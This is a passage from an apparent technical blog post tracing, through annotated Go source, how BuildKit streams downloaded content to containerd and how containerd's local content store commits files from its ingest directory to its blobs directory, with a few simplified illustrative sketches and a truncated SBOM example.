<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"_type":"https://in-toto.io/Statement/v0.1","predicateType":"https://spdx.dev/Document","subject":[],"predicate":{"spdxVersion":"SPDX-2.3","dataLicense":"CC0-1.0","SPDXID":"SPDXRef-DOCUMENT","name":"sbom","documentNamespace":"https://docker.com/docker-scout/fs/sbom-6b8f300a-23d8-42b3-9f97-0882a7efe944","creationInfo":{"creators":["Organization: Docker, Inc","Tool: docker-scout-1.18.1","Tool: buildkit-0.16.0-tianon"],"created":"2026-04-15T20:02:39Z"},"packages":[{"name":"sbom","SPDXID":"SPDXRef-DocumentRoot","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","primaryPackagePurpose":"FILE"},{"name":"acl","SPDXID":"SPDXRef-Package-45b9051d819bf7a6bd6a86b0eba5bc45","versionInfo":"2.3.2-1build1.1","supplier":"Person: Ubuntu Developers \\u003cubuntu-devel-discuss@lists.ubuntu.com\\u003e","originator":"Person: Ubuntu Developers \\u003cubuntu-devel-discuss@lists.ubuntu.com\\u003e","downloadLocation":"NOASSERTION","filesAnalyzed":true,"licenseConcluded":"NOASSERTION","licenseDeclared":"GPL-2.0-only OR GPL-2.0-or-later OR LGPL-2.0-or-later OR LGPL-2.1-only","description":"access control list - shared library\n This package contains the shared library containing the POSIX 1003.1e\n draft standard 17 functions for manipulating access control lists.","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:deb/ubuntu/acl@2.3.2-1build1.1?os_distro=noble\u0026os_name=ubuntu\u0026os_version=24.04"}]} ...] ...} ...}
</code></pre></div></div>

<h3 id="15-save-the-file">1.5. Save The File</h3>

<p>Now we know the download flow, but when is the data written to the filesystem?</p>

<p>After fetching the data, <code class="language-plaintext highlighter-rouge">content.Copy()</code> is called [1] with the writer <code class="language-plaintext highlighter-rouge">cw</code>, the data size <code class="language-plaintext highlighter-rouge">desc.Size</code>, and the hash <code class="language-plaintext highlighter-rouge">desc.Digest</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/handlers.go</span>
<span class="k">func</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ingester</span> <span class="n">content</span><span class="o">.</span><span class="n">Ingester</span><span class="p">,</span> <span class="n">fetcher</span> <span class="n">Fetcher</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">cw</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">OpenWriter</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ingester</span><span class="p">,</span> <span class="n">content</span><span class="o">.</span><span class="n">WithRef</span><span class="p">(</span><span class="n">MakeRefKey</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)),</span> <span class="n">content</span><span class="o">.</span><span class="n">WithDescriptor</span><span class="p">(</span><span class="n">desc</span><span class="p">))</span>
    <span class="c">// [...]</span>
    <span class="n">rc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fetcher</span><span class="o">.</span><span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">content</span><span class="o">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">cw</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span> <span class="c">// [1]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The writer object is created by <code class="language-plaintext highlighter-rouge">OpenWriter()</code>, which eventually returns a <code class="language-plaintext highlighter-rouge">remoteWriter</code> object [2] whose client is backed by a gRPC stream to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/content/helpers.go</span>
<span class="k">func</span> <span class="n">OpenWriter</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cs</span> <span class="n">Ingester</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">WriterOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="p">(</span>
        <span class="n">cw</span>    <span class="n">Writer</span>
        <span class="n">err</span>   <span class="kt">error</span>
        <span class="n">retry</span> <span class="o">=</span> <span class="m">16</span>
    <span class="p">)</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="n">cw</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">cs</span><span class="o">.</span><span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/content/proxy/content_store.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">pcs</span> <span class="o">*</span><span class="n">proxyContentStore</span><span class="p">)</span> <span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">content</span><span class="o">.</span><span class="n">WriterOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">wrclient</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">pcs</span><span class="o">.</span><span class="n">negotiate</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Ref</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">remoteWriter</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">ref</span><span class="o">:</span>    <span class="n">wOpts</span><span class="o">.</span><span class="n">Ref</span><span class="p">,</span>
        <span class="n">client</span><span class="o">:</span> <span class="n">wrclient</span><span class="p">,</span>
        <span class="n">offset</span><span class="o">:</span> <span class="n">offset</span><span class="p">,</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Copy()</code> writes the data by calling <code class="language-plaintext highlighter-rouge">copyWithBuffer()</code> and finalizes it by calling <code class="language-plaintext highlighter-rouge">cw.Commit()</code>. Both calls end up sending a request to <code class="language-plaintext highlighter-rouge">containerd</code> over the writer’s stream. Take <code class="language-plaintext highlighter-rouge">copyWithBuffer()</code> as an example: each <code class="language-plaintext highlighter-rouge">dst.Write()</code> reaches <code class="language-plaintext highlighter-rouge">remoteWriter.Write()</code>, which sends a <code class="language-plaintext highlighter-rouge">WriteAction_WRITE</code> action with the data attached [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/content/helpers.go</span>
<span class="k">func</span> <span class="n">Copy</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cw</span> <span class="n">Writer</span><span class="p">,</span> <span class="n">or</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">expected</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">Opt</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">copied</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">copyWithBuffer</span><span class="p">(</span><span class="n">cw</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">cw</span><span class="o">.</span><span class="n">Commit</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">expected</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">copyWithBuffer</span><span class="p">(</span><span class="n">dst</span> <span class="n">io</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="n">src</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">)</span> <span class="p">(</span><span class="n">written</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="n">nr</span><span class="p">,</span> <span class="n">er</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadAtLeast</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">buf</span><span class="p">))</span> <span class="c">// read from src</span>
        <span class="k">if</span> <span class="n">nr</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
            <span class="n">nw</span><span class="p">,</span> <span class="n">ew</span> <span class="o">:=</span> <span class="n">dst</span><span class="o">.</span><span class="n">Write</span><span class="p">(</span><span class="n">buf</span><span class="p">[</span><span class="m">0</span><span class="o">:</span><span class="n">nr</span><span class="p">])</span>  <span class="c">// &lt;-------- write to dst</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/content/proxy/content_writer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">rw</span> <span class="o">*</span><span class="n">remoteWriter</span><span class="p">)</span> <span class="n">Write</span><span class="p">(</span><span class="n">p</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">)</span> <span class="p">(</span><span class="n">n</span> <span class="kt">int</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">const</span> <span class="n">maxBufferSize</span> <span class="o">=</span> <span class="n">defaults</span><span class="o">.</span><span class="n">DefaultMaxSendMsgSize</span> <span class="o">&gt;&gt;</span> <span class="m">1</span>
    <span class="k">for</span> <span class="n">data</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">slices</span><span class="o">.</span><span class="n">Chunk</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">maxBufferSize</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">offset</span> <span class="o">:=</span> <span class="n">rw</span><span class="o">.</span><span class="n">offset</span>

        <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rw</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="o">&amp;</span><span class="n">contentapi</span><span class="o">.</span><span class="n">WriteContentRequest</span><span class="p">{</span>
            <span class="n">Action</span><span class="o">:</span> <span class="n">contentapi</span><span class="o">.</span><span class="n">WriteAction_WRITE</span><span class="p">,</span> <span class="c">// [3]</span>
            <span class="n">Offset</span><span class="o">:</span> <span class="n">offset</span><span class="p">,</span>
            <span class="n">Data</span><span class="o">:</span>   <span class="n">data</span><span class="p">,</span>
        <span class="p">})</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">n</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the <code class="language-plaintext highlighter-rouge">containerd</code> side, the content server’s <code class="language-plaintext highlighter-rouge">Write()</code> handles both WRITE and COMMIT actions. If the request is a COMMIT action, <code class="language-plaintext highlighter-rouge">wr.Commit()</code> is called [4] to save data into the filesystem.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/plugins/services/content/contentserver/contentserver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Register</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">api</span><span class="o">.</span><span class="n">RegisterContentServer</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/api/services/content/v1/content_grpc.pb.go</span>
<span class="k">func</span> <span class="n">RegisterContentServer</span><span class="p">(</span><span class="n">s</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceRegistrar</span><span class="p">,</span> <span class="n">srv</span> <span class="n">ContentServer</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">s</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Content_ServiceDesc</span><span class="p">,</span> <span class="n">srv</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">Content_ServiceDesc</span> <span class="o">=</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceDesc</span><span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">Streams</span><span class="o">:</span> <span class="p">[]</span><span class="n">grpc</span><span class="o">.</span><span class="n">StreamDesc</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="p">{</span>
            <span class="n">StreamName</span><span class="o">:</span>    <span class="s">"Write"</span><span class="p">,</span>
            <span class="n">Handler</span><span class="o">:</span>       <span class="n">_Content_Write_Handler</span><span class="p">,</span> <span class="c">// &lt;--------</span>
            <span class="n">ServerStreams</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span>
            <span class="n">ClientStreams</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span>
        <span class="p">},</span>
    <span class="p">},</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">_Content_Write_Handler</span><span class="p">(</span><span class="n">srv</span> <span class="k">interface</span><span class="p">{},</span> <span class="n">stream</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServerStream</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">srv</span><span class="o">.</span><span class="p">(</span><span class="n">ContentServer</span><span class="p">)</span><span class="o">.</span><span class="n">Write</span><span class="p">(</span><span class="o">&amp;</span><span class="n">contentWriteServer</span><span class="p">{</span><span class="n">stream</span><span class="p">})</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/plugins/services/content/contentserver/contentserver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Write</span><span class="p">(</span><span class="n">session</span> <span class="n">api</span><span class="o">.</span><span class="n">Content_WriteServer</span><span class="p">)</span> <span class="p">(</span><span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">wr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">store</span><span class="o">.</span><span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span>
        <span class="n">content</span><span class="o">.</span><span class="n">WithRef</span><span class="p">(</span><span class="n">ref</span><span class="p">),</span>
        <span class="n">content</span><span class="o">.</span><span class="n">WithDescriptor</span><span class="p">(</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{</span><span class="n">Size</span><span class="o">:</span> <span class="n">total</span><span class="p">,</span> <span class="n">Digest</span><span class="o">:</span> <span class="n">expected</span><span class="p">}))</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="n">msg</span><span class="o">.</span><span class="n">Action</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="n">Action</span>
        <span class="k">switch</span> <span class="n">req</span><span class="o">.</span><span class="n">Action</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">api</span><span class="o">.</span><span class="n">WriteAction_WRITE</span><span class="p">,</span> <span class="n">api</span><span class="o">.</span><span class="n">WriteAction_COMMIT</span><span class="o">:</span>
            <span class="c">// [...]</span>
            <span class="k">if</span> <span class="n">req</span><span class="o">.</span><span class="n">Action</span> <span class="o">==</span> <span class="n">api</span><span class="o">.</span><span class="n">WriteAction_COMMIT</span> <span class="p">{</span>
                <span class="c">// [...]</span>
                <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">wr</span><span class="o">.</span><span class="n">Commit</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">total</span><span class="p">,</span> <span class="n">expected</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [4]</span>
                    <span class="c">// [...]</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
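
<p>The shape of that server loop, where WRITE and COMMIT share one case and only COMMIT finalizes, can be sketched without gRPC. Everything here is hypothetical: <code class="language-plaintext highlighter-rouge">request</code>, <code class="language-plaintext highlighter-rouge">memWriter</code>, and <code class="language-plaintext highlighter-rouge">serve()</code> are made-up names, the stream is replaced by a slice, and it is an assumption of this sketch that a COMMIT request may carry trailing data.</p>

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

type action int

const (
	actionWrite action = iota
	actionCommit
)

// request is a hypothetical stand-in for a message received on the stream.
type request struct {
	Action action
	Data   []byte
}

// memWriter buffers data in memory instead of writing an ingest file.
type memWriter struct {
	buf       bytes.Buffer
	committed bool
}

// serve processes requests in order: both actions may append data,
// but only COMMIT marks the content as finalized.
func serve(reqs []request, w *memWriter) error {
	for _, req := range reqs {
		switch req.Action {
		case actionWrite, actionCommit:
			if len(req.Data) > 0 {
				w.buf.Write(req.Data)
			}
			if req.Action == actionCommit {
				w.committed = true
				return nil
			}
		default:
			return fmt.Errorf("unsupported action %d", req.Action)
		}
	}
	return errors.New("stream ended without a COMMIT action")
}

func main() {
	w := &memWriter{}
	err := serve([]request{
		{Action: actionWrite, Data: []byte("hello ")},
		{Action: actionWrite, Data: []byte("world")},
		{Action: actionCommit},
	}, w)
	fmt.Println(w.buf.String(), w.committed, err)
}
```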

<p>While a write is in progress, the data is kept in a temporary file under the <code class="language-plaintext highlighter-rouge">"ingest/"</code> directory. When a COMMIT action arrives, <code class="language-plaintext highlighter-rouge">Commit()</code> renames that file to its destination path [5], which is inside the <code class="language-plaintext highlighter-rouge">"blobs/"</code> directory.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/plugins/content/local/writer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">w</span> <span class="o">*</span><span class="n">writer</span><span class="p">)</span> <span class="n">Commit</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">expected</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">content</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">dgst</span> <span class="o">:=</span> <span class="n">w</span><span class="o">.</span><span class="n">digester</span><span class="o">.</span><span class="n">Digest</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="p">(</span>
        <span class="n">ingest</span>    <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">w</span><span class="o">.</span><span class="n">path</span><span class="p">,</span> <span class="s">"data"</span><span class="p">)</span> <span class="c">// ingest/&lt;hash(ref)&gt;/data</span>
        <span class="n">target</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">w</span><span class="o">.</span><span class="n">s</span><span class="o">.</span><span class="n">blobPath</span><span class="p">(</span><span class="n">dgst</span><span class="p">)</span>            <span class="c">// blobs/sha256/&lt;dgst&gt;</span>
    <span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">Rename</span><span class="p">(</span><span class="n">ingest</span><span class="p">,</span> <span class="n">target</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The writer object (<code class="language-plaintext highlighter-rouge">w</code>) decides the root directory in which to save the file, and it is initialized in <code class="language-plaintext highlighter-rouge">writer()</code> [6].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/plugins/content/local/store.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">store</span><span class="p">)</span> <span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">content</span><span class="o">.</span><span class="n">WriterOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">w</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">writer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Ref</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">w</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">store</span><span class="p">)</span> <span class="n">writer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">total</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">expected</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">path</span><span class="p">,</span> <span class="n">refp</span><span class="p">,</span> <span class="n">data</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">ingestPaths</span><span class="p">(</span><span class="n">ref</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">writer</span><span class="p">{</span> <span class="c">// [6]</span>
        <span class="c">// [...]</span>
        <span class="n">ref</span><span class="o">:</span>       <span class="n">ref</span><span class="p">,</span>
        <span class="n">path</span><span class="o">:</span>      <span class="n">path</span><span class="p">,</span>
        <span class="c">// [...]</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To get the full path, we have to look at the <code class="language-plaintext highlighter-rouge">containerd</code> source code.</p>

<p><code class="language-plaintext highlighter-rouge">containerd</code> splits its functionality into <strong>separate plugin objects</strong>. A plugin’s <code class="language-plaintext highlighter-rouge">init()</code> function registers its ID and initialization callback. Here, the ID of the content plugin is <code class="language-plaintext highlighter-rouge">"content"</code> [7], and its callback passes the root directory property to the store as its root [8].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/content/local/plugin/plugin.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span>
        <span class="n">Type</span><span class="o">:</span> <span class="n">plugins</span><span class="o">.</span><span class="n">ContentPlugin</span><span class="p">,</span>
        <span class="n">ID</span><span class="o">:</span>   <span class="s">"content"</span><span class="p">,</span> <span class="c">// [7]</span>
        <span class="n">InitFn</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ic</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">InitContext</span><span class="p">)</span> <span class="p">(</span><span class="n">any</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">root</span> <span class="o">:=</span> <span class="n">ic</span><span class="o">.</span><span class="n">Properties</span><span class="p">[</span><span class="n">plugins</span><span class="o">.</span><span class="n">PropertyRootDir</span><span class="p">]</span>
            <span class="n">ic</span><span class="o">.</span><span class="n">Meta</span><span class="o">.</span><span class="n">Exports</span><span class="p">[</span><span class="s">"root"</span><span class="p">]</span> <span class="o">=</span> <span class="n">root</span>
            <span class="k">return</span> <span class="n">local</span><span class="o">.</span><span class="n">NewStore</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/plugins/content/local/store.go</span>
<span class="k">func</span> <span class="n">NewStore</span><span class="p">(</span><span class="n">root</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Store</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">NewLabeledStore</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">NewLabeledStore</span><span class="p">(</span><span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">ls</span> <span class="n">LabelStore</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Store</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">s</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">store</span><span class="p">{</span>
        <span class="n">root</span><span class="o">:</span>               <span class="n">root</span><span class="p">,</span> <span class="c">// [8]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
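
<p>The self-registration pattern used above can be reduced to a few lines. This is a simplified sketch, not containerd’s plugin package: <code class="language-plaintext highlighter-rouge">registration</code>, <code class="language-plaintext highlighter-rouge">initContext</code>, <code class="language-plaintext highlighter-rouge">register()</code>, and <code class="language-plaintext highlighter-rouge">initAll()</code> are hypothetical names, the type string is made up, and building the URI as type plus ID is an assumption of this sketch.</p>

```go
package main

import "fmt"

// initContext carries the properties handed to a plugin at init time.
type initContext struct {
	Properties map[string]string
}

// registration describes one plugin: its type, ID, and init callback.
type registration struct {
	Type, ID string
	InitFn   func(ic *initContext) (any, error)
}

// URI joins type and ID (an assumption of this sketch).
func (r *registration) URI() string { return r.Type + "." + r.ID }

var registered []*registration

func register(r *registration) { registered = append(registered, r) }

// store is a toy content store that only remembers its root.
type store struct{ root string }

// init runs before main, so the plugin is registered by the time
// the "server" starts iterating over registrations.
func init() {
	register(&registration{
		Type: "example.content.v1", // made-up type string
		ID:   "content",
		InitFn: func(ic *initContext) (any, error) {
			return &store{root: ic.Properties["root"]}, nil
		},
	})
}

// initAll calls every registered callback and indexes the results by URI.
func initAll(props map[string]string) (map[string]any, error) {
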